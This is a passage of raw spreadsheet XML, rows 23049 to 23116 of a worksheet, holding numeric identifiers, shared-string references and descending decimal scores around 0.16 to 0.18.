      </c>
      <c r="F23049" s="2">
        <v>0.1752873563218392</v>
      </c>
    </row>
    <row r="23050" ht="15.75" customHeight="1">
      <c r="A23050" s="1">
        <v>20774.0</v>
      </c>
      <c r="B23050" s="2">
        <v>1.4980605E7</v>
      </c>
      <c r="C23050" s="2" t="s">
        <v>22255</v>
      </c>
      <c r="D23050" s="2">
        <v>1.0</v>
      </c>
      <c r="E23050" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23050" s="2">
        <v>0.1750000000000001</v>
      </c>
    </row>
    <row r="23051" ht="15.75" customHeight="1">
      <c r="A23051" s="1">
        <v>28840.0</v>
      </c>
      <c r="B23051" s="2">
        <v>2.8929398E7</v>
      </c>
      <c r="C23051" s="2" t="s">
        <v>22256</v>
      </c>
      <c r="D23051" s="2">
        <v>1.0</v>
      </c>
      <c r="E23051" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23051" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="23052" ht="15.75" customHeight="1">
      <c r="A23052" s="1">
        <v>24476.0</v>
      </c>
      <c r="B23052" s="2">
        <v>1.1033555E7</v>
      </c>
      <c r="C23052" s="2" t="s">
        <v>22257</v>
      </c>
      <c r="D23052" s="2">
        <v>1.0</v>
      </c>
      <c r="E23052" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23052" s="2">
        <v>0.1737213403880071</v>
      </c>
    </row>
    <row r="23053" ht="15.75" customHeight="1">
      <c r="A23053" s="1">
        <v>21577.0</v>
      </c>
      <c r="B23053" s="2">
        <v>2.3846992E7</v>
      </c>
      <c r="C23053" s="2" t="s">
        <v>22258</v>
      </c>
      <c r="D23053" s="2">
        <v>1.0</v>
      </c>
      <c r="E23053" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23053" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="23054" ht="15.75" customHeight="1">
      <c r="A23054" s="1">
        <v>28448.0</v>
      </c>
      <c r="B23054" s="2">
        <v>2.6559092E7</v>
      </c>
      <c r="C23054" s="2" t="s">
        <v>22259</v>
      </c>
      <c r="D23054" s="2">
        <v>1.0</v>
      </c>
      <c r="E23054" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23054" s="2">
        <v>0.1727430555555556</v>
      </c>
    </row>
    <row r="23055" ht="15.75" customHeight="1">
      <c r="A23055" s="1">
        <v>29935.0</v>
      </c>
      <c r="B23055" s="2">
        <v>3607191.0</v>
      </c>
      <c r="C23055" s="2" t="s">
        <v>22260</v>
      </c>
      <c r="D23055" s="2">
        <v>1.0</v>
      </c>
      <c r="E23055" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23055" s="2">
        <v>0.172514619883041</v>
      </c>
    </row>
    <row r="23056" ht="15.75" customHeight="1">
      <c r="A23056" s="1">
        <v>28873.0</v>
      </c>
      <c r="B23056" s="2">
        <v>2.9139415E7</v>
      </c>
      <c r="C23056" s="2" t="s">
        <v>22261</v>
      </c>
      <c r="D23056" s="2">
        <v>1.0</v>
      </c>
      <c r="E23056" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23056" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="23057" ht="15.75" customHeight="1">
      <c r="A23057" s="1">
        <v>28261.0</v>
      </c>
      <c r="B23057" s="2">
        <v>2.5368368E7</v>
      </c>
      <c r="C23057" s="2" t="s">
        <v>22262</v>
      </c>
      <c r="D23057" s="2">
        <v>1.0</v>
      </c>
      <c r="E23057" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23057" s="2">
        <v>0.1721311475409837</v>
      </c>
    </row>
    <row r="23058" ht="15.75" customHeight="1">
      <c r="A23058" s="1">
        <v>26865.0</v>
      </c>
      <c r="B23058" s="2">
        <v>1.9057415E7</v>
      </c>
      <c r="C23058" s="2" t="s">
        <v>22263</v>
      </c>
      <c r="D23058" s="2">
        <v>1.0</v>
      </c>
      <c r="E23058" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23058" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="23059" ht="15.75" customHeight="1">
      <c r="A23059" s="1">
        <v>26879.0</v>
      </c>
      <c r="B23059" s="2">
        <v>1.916513E7</v>
      </c>
      <c r="C23059" s="2" t="s">
        <v>22264</v>
      </c>
      <c r="D23059" s="2">
        <v>1.0</v>
      </c>
      <c r="E23059" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23059" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="23060" ht="15.75" customHeight="1">
      <c r="A23060" s="1">
        <v>30205.0</v>
      </c>
      <c r="B23060" s="2">
        <v>3.7328491E7</v>
      </c>
      <c r="C23060" s="2" t="s">
        <v>22265</v>
      </c>
      <c r="D23060" s="2">
        <v>1.0</v>
      </c>
      <c r="E23060" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23060" s="2">
        <v>0.1705653021442496</v>
      </c>
    </row>
    <row r="23061" ht="15.75" customHeight="1">
      <c r="A23061" s="1">
        <v>25279.0</v>
      </c>
      <c r="B23061" s="2">
        <v>1.3396344E7</v>
      </c>
      <c r="C23061" s="2" t="s">
        <v>22266</v>
      </c>
      <c r="D23061" s="2">
        <v>1.0</v>
      </c>
      <c r="E23061" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23061" s="2">
        <v>0.1704331450094163</v>
      </c>
    </row>
    <row r="23062" ht="15.75" customHeight="1">
      <c r="A23062" s="1">
        <v>21260.0</v>
      </c>
      <c r="B23062" s="2">
        <v>2.0042527E7</v>
      </c>
      <c r="C23062" s="2" t="s">
        <v>22267</v>
      </c>
      <c r="D23062" s="2">
        <v>1.0</v>
      </c>
      <c r="E23062" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23062" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="23063" ht="15.75" customHeight="1">
      <c r="A23063" s="1">
        <v>21953.0</v>
      </c>
      <c r="B23063" s="2">
        <v>2.8912092E7</v>
      </c>
      <c r="C23063" s="2" t="s">
        <v>22268</v>
      </c>
      <c r="D23063" s="2">
        <v>1.0</v>
      </c>
      <c r="E23063" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23063" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="23064" ht="15.75" customHeight="1">
      <c r="A23064" s="1">
        <v>26015.0</v>
      </c>
      <c r="B23064" s="2">
        <v>1.536484E7</v>
      </c>
      <c r="C23064" s="2" t="s">
        <v>22269</v>
      </c>
      <c r="D23064" s="2">
        <v>1.0</v>
      </c>
      <c r="E23064" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23064" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="23065" ht="15.75" customHeight="1">
      <c r="A23065" s="1">
        <v>31321.0</v>
      </c>
      <c r="B23065" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C23065" s="2" t="s">
        <v>22270</v>
      </c>
      <c r="D23065" s="2">
        <v>1.0</v>
      </c>
      <c r="E23065" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23065" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="23066" ht="15.75" customHeight="1">
      <c r="A23066" s="1">
        <v>21173.0</v>
      </c>
      <c r="B23066" s="2">
        <v>1.9057416E7</v>
      </c>
      <c r="C23066" s="2" t="s">
        <v>22271</v>
      </c>
      <c r="D23066" s="2">
        <v>1.0</v>
      </c>
      <c r="E23066" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23066" s="2">
        <v>0.1692708333333334</v>
      </c>
    </row>
    <row r="23067" ht="15.75" customHeight="1">
      <c r="A23067" s="1">
        <v>26246.0</v>
      </c>
      <c r="B23067" s="2">
        <v>1.6318363E7</v>
      </c>
      <c r="C23067" s="2" t="s">
        <v>22272</v>
      </c>
      <c r="D23067" s="2">
        <v>1.0</v>
      </c>
      <c r="E23067" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23067" s="2">
        <v>0.1691919191919192</v>
      </c>
    </row>
    <row r="23068" ht="15.75" customHeight="1">
      <c r="A23068" s="1">
        <v>20559.0</v>
      </c>
      <c r="B23068" s="2">
        <v>1.3396345E7</v>
      </c>
      <c r="C23068" s="2" t="s">
        <v>22266</v>
      </c>
      <c r="D23068" s="2">
        <v>1.0</v>
      </c>
      <c r="E23068" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23068" s="2">
        <v>0.1685499058380415</v>
      </c>
    </row>
    <row r="23069" ht="15.75" customHeight="1">
      <c r="A23069" s="1">
        <v>23582.0</v>
      </c>
      <c r="B23069" s="2">
        <v>6270097.0</v>
      </c>
      <c r="C23069" s="2" t="s">
        <v>22273</v>
      </c>
      <c r="D23069" s="2">
        <v>1.0</v>
      </c>
      <c r="E23069" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23069" s="2">
        <v>0.1685499058380415</v>
      </c>
    </row>
    <row r="23070" ht="15.75" customHeight="1">
      <c r="A23070" s="1">
        <v>33985.0</v>
      </c>
      <c r="B23070" s="2">
        <v>9402689.0</v>
      </c>
      <c r="C23070" s="2" t="s">
        <v>22274</v>
      </c>
      <c r="D23070" s="2">
        <v>1.0</v>
      </c>
      <c r="E23070" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23070" s="2">
        <v>0.1685499058380415</v>
      </c>
    </row>
    <row r="23071" ht="15.75" customHeight="1">
      <c r="A23071" s="1">
        <v>24816.0</v>
      </c>
      <c r="B23071" s="2">
        <v>1.2086544E7</v>
      </c>
      <c r="C23071" s="2" t="s">
        <v>22275</v>
      </c>
      <c r="D23071" s="2">
        <v>1.0</v>
      </c>
      <c r="E23071" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23071" s="2">
        <v>0.1683760683760684</v>
      </c>
    </row>
    <row r="23072" ht="15.75" customHeight="1">
      <c r="A23072" s="1">
        <v>31392.0</v>
      </c>
      <c r="B23072" s="2">
        <v>4998806.0</v>
      </c>
      <c r="C23072" s="2" t="s">
        <v>22276</v>
      </c>
      <c r="D23072" s="2">
        <v>1.0</v>
      </c>
      <c r="E23072" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23072" s="2">
        <v>0.1680053547523428</v>
      </c>
    </row>
    <row r="23073" ht="15.75" customHeight="1">
      <c r="A23073" s="1">
        <v>26497.0</v>
      </c>
      <c r="B23073" s="2">
        <v>1.753715E7</v>
      </c>
      <c r="C23073" s="2" t="s">
        <v>22277</v>
      </c>
      <c r="D23073" s="2">
        <v>1.0</v>
      </c>
      <c r="E23073" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23073" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="23074" ht="15.75" customHeight="1">
      <c r="A23074" s="1">
        <v>21871.0</v>
      </c>
      <c r="B23074" s="2">
        <v>2.7533657E7</v>
      </c>
      <c r="C23074" s="2" t="s">
        <v>22278</v>
      </c>
      <c r="D23074" s="2">
        <v>1.0</v>
      </c>
      <c r="E23074" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23074" s="2">
        <v>0.167562724014337</v>
      </c>
    </row>
    <row r="23075" ht="15.75" customHeight="1">
      <c r="A23075" s="1">
        <v>33040.0</v>
      </c>
      <c r="B23075" s="2">
        <v>6739237.0</v>
      </c>
      <c r="C23075" s="2" t="s">
        <v>22279</v>
      </c>
      <c r="D23075" s="2">
        <v>1.0</v>
      </c>
      <c r="E23075" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23075" s="2">
        <v>0.167562724014337</v>
      </c>
    </row>
    <row r="23076" ht="15.75" customHeight="1">
      <c r="A23076" s="1">
        <v>20912.0</v>
      </c>
      <c r="B23076" s="2">
        <v>1.6318364E7</v>
      </c>
      <c r="C23076" s="2" t="s">
        <v>22280</v>
      </c>
      <c r="D23076" s="2">
        <v>1.0</v>
      </c>
      <c r="E23076" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23076" s="2">
        <v>0.1675084175084176</v>
      </c>
    </row>
    <row r="23077" ht="15.75" customHeight="1">
      <c r="A23077" s="1">
        <v>6121.0</v>
      </c>
      <c r="B23077" s="2">
        <v>4.7783372E7</v>
      </c>
      <c r="C23077" s="2" t="s">
        <v>22281</v>
      </c>
      <c r="D23077" s="2">
        <v>1.0</v>
      </c>
      <c r="E23077" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23077" s="2">
        <v>0.1674603174603175</v>
      </c>
    </row>
    <row r="23078" ht="15.75" customHeight="1">
      <c r="A23078" s="1">
        <v>28293.0</v>
      </c>
      <c r="B23078" s="2">
        <v>2.5582887E7</v>
      </c>
      <c r="C23078" s="2" t="s">
        <v>22282</v>
      </c>
      <c r="D23078" s="2">
        <v>1.0</v>
      </c>
      <c r="E23078" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23078" s="2">
        <v>0.1673976608187135</v>
      </c>
    </row>
    <row r="23079" ht="15.75" customHeight="1">
      <c r="A23079" s="1">
        <v>26296.0</v>
      </c>
      <c r="B23079" s="2">
        <v>1.652628E7</v>
      </c>
      <c r="C23079" s="2" t="s">
        <v>22283</v>
      </c>
      <c r="D23079" s="2">
        <v>1.0</v>
      </c>
      <c r="E23079" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23079" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="23080" ht="15.75" customHeight="1">
      <c r="A23080" s="1">
        <v>26852.0</v>
      </c>
      <c r="B23080" s="2">
        <v>1.9013433E7</v>
      </c>
      <c r="C23080" s="2" t="s">
        <v>22284</v>
      </c>
      <c r="D23080" s="2">
        <v>1.0</v>
      </c>
      <c r="E23080" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23080" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="23081" ht="15.75" customHeight="1">
      <c r="A23081" s="1">
        <v>27140.0</v>
      </c>
      <c r="B23081" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C23081" s="2" t="s">
        <v>22285</v>
      </c>
      <c r="D23081" s="2">
        <v>1.0</v>
      </c>
      <c r="E23081" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23081" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="23082" ht="15.75" customHeight="1">
      <c r="A23082" s="1">
        <v>28503.0</v>
      </c>
      <c r="B23082" s="2">
        <v>2.6708797E7</v>
      </c>
      <c r="C23082" s="2" t="s">
        <v>22286</v>
      </c>
      <c r="D23082" s="2">
        <v>1.0</v>
      </c>
      <c r="E23082" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23082" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="23083" ht="15.75" customHeight="1">
      <c r="A23083" s="1">
        <v>28836.0</v>
      </c>
      <c r="B23083" s="2">
        <v>2.8912091E7</v>
      </c>
      <c r="C23083" s="2" t="s">
        <v>22287</v>
      </c>
      <c r="D23083" s="2">
        <v>1.0</v>
      </c>
      <c r="E23083" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23083" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="23084" ht="15.75" customHeight="1">
      <c r="A23084" s="1">
        <v>33497.0</v>
      </c>
      <c r="B23084" s="2">
        <v>8049712.0</v>
      </c>
      <c r="C23084" s="2" t="s">
        <v>22288</v>
      </c>
      <c r="D23084" s="2">
        <v>1.0</v>
      </c>
      <c r="E23084" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23084" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="23085" ht="15.75" customHeight="1">
      <c r="A23085" s="1">
        <v>15871.0</v>
      </c>
      <c r="B23085" s="2">
        <v>4.4503531E7</v>
      </c>
      <c r="C23085" s="2" t="s">
        <v>22289</v>
      </c>
      <c r="D23085" s="2">
        <v>1.0</v>
      </c>
      <c r="E23085" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23085" s="2">
        <v>0.1658249158249159</v>
      </c>
    </row>
    <row r="23086" ht="15.75" customHeight="1">
      <c r="A23086" s="1">
        <v>8601.0</v>
      </c>
      <c r="B23086" s="2">
        <v>5.426582E7</v>
      </c>
      <c r="C23086" s="2" t="s">
        <v>22290</v>
      </c>
      <c r="D23086" s="2">
        <v>1.0</v>
      </c>
      <c r="E23086" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23086" s="2">
        <v>0.1657986111111111</v>
      </c>
    </row>
    <row r="23087" ht="15.75" customHeight="1">
      <c r="A23087" s="1">
        <v>29239.0</v>
      </c>
      <c r="B23087" s="2">
        <v>3.0844182E7</v>
      </c>
      <c r="C23087" s="2" t="s">
        <v>22291</v>
      </c>
      <c r="D23087" s="2">
        <v>1.0</v>
      </c>
      <c r="E23087" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23087" s="2">
        <v>0.1657706093189965</v>
      </c>
    </row>
    <row r="23088" ht="15.75" customHeight="1">
      <c r="A23088" s="1">
        <v>23650.0</v>
      </c>
      <c r="B23088" s="2">
        <v>6753470.0</v>
      </c>
      <c r="C23088" s="2" t="s">
        <v>22292</v>
      </c>
      <c r="D23088" s="2">
        <v>1.0</v>
      </c>
      <c r="E23088" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23088" s="2">
        <v>0.1657407407407408</v>
      </c>
    </row>
    <row r="23089" ht="15.75" customHeight="1">
      <c r="A23089" s="1">
        <v>24815.0</v>
      </c>
      <c r="B23089" s="2">
        <v>1.2086544E7</v>
      </c>
      <c r="C23089" s="2" t="s">
        <v>22293</v>
      </c>
      <c r="D23089" s="2">
        <v>1.0</v>
      </c>
      <c r="E23089" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23089" s="2">
        <v>0.1657407407407408</v>
      </c>
    </row>
    <row r="23090" ht="15.75" customHeight="1">
      <c r="A23090" s="1">
        <v>28315.0</v>
      </c>
      <c r="B23090" s="2">
        <v>2.5708804E7</v>
      </c>
      <c r="C23090" s="2" t="s">
        <v>22294</v>
      </c>
      <c r="D23090" s="2">
        <v>1.0</v>
      </c>
      <c r="E23090" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23090" s="2">
        <v>0.1657407407407407</v>
      </c>
    </row>
    <row r="23091" ht="15.75" customHeight="1">
      <c r="A23091" s="1">
        <v>26726.0</v>
      </c>
      <c r="B23091" s="2">
        <v>1.8263342E7</v>
      </c>
      <c r="C23091" s="2" t="s">
        <v>22295</v>
      </c>
      <c r="D23091" s="2">
        <v>1.0</v>
      </c>
      <c r="E23091" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23091" s="2">
        <v>0.1650082918739636</v>
      </c>
    </row>
    <row r="23092" ht="15.75" customHeight="1">
      <c r="A23092" s="1">
        <v>33929.0</v>
      </c>
      <c r="B23092" s="2">
        <v>9281881.0</v>
      </c>
      <c r="C23092" s="2" t="s">
        <v>22296</v>
      </c>
      <c r="D23092" s="2">
        <v>1.0</v>
      </c>
      <c r="E23092" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23092" s="2">
        <v>0.1649029982363316</v>
      </c>
    </row>
    <row r="23093" ht="15.75" customHeight="1">
      <c r="A23093" s="1">
        <v>30780.0</v>
      </c>
      <c r="B23093" s="2">
        <v>4.4739123E7</v>
      </c>
      <c r="C23093" s="2" t="s">
        <v>22297</v>
      </c>
      <c r="D23093" s="2">
        <v>1.0</v>
      </c>
      <c r="E23093" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23093" s="2">
        <v>0.1642156862745099</v>
      </c>
    </row>
    <row r="23094" ht="15.75" customHeight="1">
      <c r="A23094" s="1">
        <v>24475.0</v>
      </c>
      <c r="B23094" s="2">
        <v>1.1033555E7</v>
      </c>
      <c r="C23094" s="2" t="s">
        <v>22298</v>
      </c>
      <c r="D23094" s="2">
        <v>1.0</v>
      </c>
      <c r="E23094" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23094" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="23095" ht="15.75" customHeight="1">
      <c r="A23095" s="1">
        <v>24882.0</v>
      </c>
      <c r="B23095" s="2">
        <v>1.2236108E7</v>
      </c>
      <c r="C23095" s="2" t="s">
        <v>22299</v>
      </c>
      <c r="D23095" s="2">
        <v>1.0</v>
      </c>
      <c r="E23095" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23095" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="23096" ht="15.75" customHeight="1">
      <c r="A23096" s="1">
        <v>32950.0</v>
      </c>
      <c r="B23096" s="2">
        <v>6489156.0</v>
      </c>
      <c r="C23096" s="2" t="s">
        <v>22300</v>
      </c>
      <c r="D23096" s="2">
        <v>1.0</v>
      </c>
      <c r="E23096" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23096" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="23097" ht="15.75" customHeight="1">
      <c r="A23097" s="1">
        <v>21606.0</v>
      </c>
      <c r="B23097" s="2">
        <v>2.4360712E7</v>
      </c>
      <c r="C23097" s="2" t="s">
        <v>22301</v>
      </c>
      <c r="D23097" s="2">
        <v>1.0</v>
      </c>
      <c r="E23097" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23097" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="23098" ht="15.75" customHeight="1">
      <c r="A23098" s="1">
        <v>23634.0</v>
      </c>
      <c r="B23098" s="2">
        <v>6615467.0</v>
      </c>
      <c r="C23098" s="2" t="s">
        <v>22301</v>
      </c>
      <c r="D23098" s="2">
        <v>1.0</v>
      </c>
      <c r="E23098" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23098" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="23099" ht="15.75" customHeight="1">
      <c r="A23099" s="1">
        <v>30841.0</v>
      </c>
      <c r="B23099" s="2">
        <v>4.5776612E7</v>
      </c>
      <c r="C23099" s="2" t="s">
        <v>22302</v>
      </c>
      <c r="D23099" s="2">
        <v>1.0</v>
      </c>
      <c r="E23099" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23099" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="23100" ht="15.75" customHeight="1">
      <c r="A23100" s="1">
        <v>33725.0</v>
      </c>
      <c r="B23100" s="2">
        <v>8525021.0</v>
      </c>
      <c r="C23100" s="2" t="s">
        <v>22303</v>
      </c>
      <c r="D23100" s="2">
        <v>1.0</v>
      </c>
      <c r="E23100" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23100" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="23101" ht="15.75" customHeight="1">
      <c r="A23101" s="1">
        <v>20812.0</v>
      </c>
      <c r="B23101" s="2">
        <v>1.5331949E7</v>
      </c>
      <c r="C23101" s="2" t="s">
        <v>22304</v>
      </c>
      <c r="D23101" s="2">
        <v>1.0</v>
      </c>
      <c r="E23101" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23101" s="2">
        <v>0.1633499170812604</v>
      </c>
    </row>
    <row r="23102" ht="15.75" customHeight="1">
      <c r="A23102" s="1">
        <v>31291.0</v>
      </c>
      <c r="B23102" s="2">
        <v>4962052.0</v>
      </c>
      <c r="C23102" s="2" t="s">
        <v>22305</v>
      </c>
      <c r="D23102" s="2">
        <v>1.0</v>
      </c>
      <c r="E23102" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23102" s="2">
        <v>0.1632478632478633</v>
      </c>
    </row>
    <row r="23103" ht="15.75" customHeight="1">
      <c r="A23103" s="1">
        <v>11078.0</v>
      </c>
      <c r="B23103" s="2">
        <v>1841523.0</v>
      </c>
      <c r="C23103" s="2" t="s">
        <v>22306</v>
      </c>
      <c r="D23103" s="2">
        <v>1.0</v>
      </c>
      <c r="E23103" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23103" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="23104" ht="15.75" customHeight="1">
      <c r="A23104" s="1">
        <v>28487.0</v>
      </c>
      <c r="B23104" s="2">
        <v>2.6668519E7</v>
      </c>
      <c r="C23104" s="2" t="s">
        <v>22286</v>
      </c>
      <c r="D23104" s="2">
        <v>1.0</v>
      </c>
      <c r="E23104" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23104" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="23105" ht="15.75" customHeight="1">
      <c r="A23105" s="1">
        <v>26100.0</v>
      </c>
      <c r="B23105" s="2">
        <v>1.5735848E7</v>
      </c>
      <c r="C23105" s="2" t="s">
        <v>22307</v>
      </c>
      <c r="D23105" s="2">
        <v>1.0</v>
      </c>
      <c r="E23105" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23105" s="2">
        <v>0.1629001883239172</v>
      </c>
    </row>
    <row r="23106" ht="15.75" customHeight="1">
      <c r="A23106" s="1">
        <v>27995.0</v>
      </c>
      <c r="B23106" s="2">
        <v>2.4216619E7</v>
      </c>
      <c r="C23106" s="2" t="s">
        <v>22308</v>
      </c>
      <c r="D23106" s="2">
        <v>1.0</v>
      </c>
      <c r="E23106" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23106" s="2">
        <v>0.1629001883239172</v>
      </c>
    </row>
    <row r="23107" ht="15.75" customHeight="1">
      <c r="A23107" s="1">
        <v>24783.0</v>
      </c>
      <c r="B23107" s="2">
        <v>1.1934264E7</v>
      </c>
      <c r="C23107" s="2" t="s">
        <v>22309</v>
      </c>
      <c r="D23107" s="2">
        <v>1.0</v>
      </c>
      <c r="E23107" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23107" s="2">
        <v>0.1625816993464053</v>
      </c>
    </row>
    <row r="23108" ht="15.75" customHeight="1">
      <c r="A23108" s="1">
        <v>32432.0</v>
      </c>
      <c r="B23108" s="2">
        <v>5655084.0</v>
      </c>
      <c r="C23108" s="2" t="s">
        <v>22310</v>
      </c>
      <c r="D23108" s="2">
        <v>1.0</v>
      </c>
      <c r="E23108" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23108" s="2">
        <v>0.1624579124579125</v>
      </c>
    </row>
    <row r="23109" ht="15.75" customHeight="1">
      <c r="A23109" s="1">
        <v>21005.0</v>
      </c>
      <c r="B23109" s="2">
        <v>1.721072E7</v>
      </c>
      <c r="C23109" s="2" t="s">
        <v>22311</v>
      </c>
      <c r="D23109" s="2">
        <v>1.0</v>
      </c>
      <c r="E23109" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23109" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="23110" ht="15.75" customHeight="1">
      <c r="A23110" s="1">
        <v>31788.0</v>
      </c>
      <c r="B23110" s="2">
        <v>5.232856E7</v>
      </c>
      <c r="C23110" s="2" t="s">
        <v>22312</v>
      </c>
      <c r="D23110" s="2">
        <v>1.0</v>
      </c>
      <c r="E23110" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23110" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="23111" ht="15.75" customHeight="1">
      <c r="A23111" s="1">
        <v>33931.0</v>
      </c>
      <c r="B23111" s="2">
        <v>9281929.0</v>
      </c>
      <c r="C23111" s="2" t="s">
        <v>22313</v>
      </c>
      <c r="D23111" s="2">
        <v>1.0</v>
      </c>
      <c r="E23111" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23111" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="23112" ht="15.75" customHeight="1">
      <c r="A23112" s="1">
        <v>33047.0</v>
      </c>
      <c r="B23112" s="2">
        <v>6753469.0</v>
      </c>
      <c r="C23112" s="2" t="s">
        <v>22292</v>
      </c>
      <c r="D23112" s="2">
        <v>1.0</v>
      </c>
      <c r="E23112" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23112" s="2">
        <v>0.1620370370370371</v>
      </c>
    </row>
    <row r="23113" ht="15.75" customHeight="1">
      <c r="A23113" s="1">
        <v>29155.0</v>
      </c>
      <c r="B23113" s="2">
        <v>3.0606939E7</v>
      </c>
      <c r="C23113" s="2" t="s">
        <v>22314</v>
      </c>
      <c r="D23113" s="2">
        <v>1.0</v>
      </c>
      <c r="E23113" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23113" s="2">
        <v>0.1618773946360154</v>
      </c>
    </row>
    <row r="23114" ht="15.75" customHeight="1">
      <c r="A23114" s="1">
        <v>31483.0</v>
      </c>
      <c r="B23114" s="2">
        <v>5049801.0</v>
      </c>
      <c r="C23114" s="2" t="s">
        <v>22314</v>
      </c>
      <c r="D23114" s="2">
        <v>1.0</v>
      </c>
      <c r="E23114" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23114" s="2">
        <v>0.1618773946360154</v>
      </c>
    </row>
    <row r="23115" ht="15.75" customHeight="1">
      <c r="A23115" s="1">
        <v>24224.0</v>
      </c>
      <c r="B23115" s="2">
        <v>1.0435516E7</v>
      </c>
      <c r="C23115" s="2" t="s">
        <v>22315</v>
      </c>
      <c r="D23115" s="2">
        <v>1.0</v>
      </c>
      <c r="E23115" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23115" s="2">
        <v>0.1618357487922706</v>
      </c>
    </row>
    <row r="23116" ht="15.75" customHeight="1">
      <c r="A23116" s="1">
        <v>28223.0</v>
      </c>
      <c r="B23116" s="2">
        <v>2.5078535E7</v>
      </c>
      <c r="C23116" s="2" t="s">
        <v>22316</v>
      </c>
      <c r="D23116" s="2">
        <v>1.0</v>
      </c>
      <c r="E23116" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23116" s="2">
        <v>0.1616915422885573</v>
      </c>
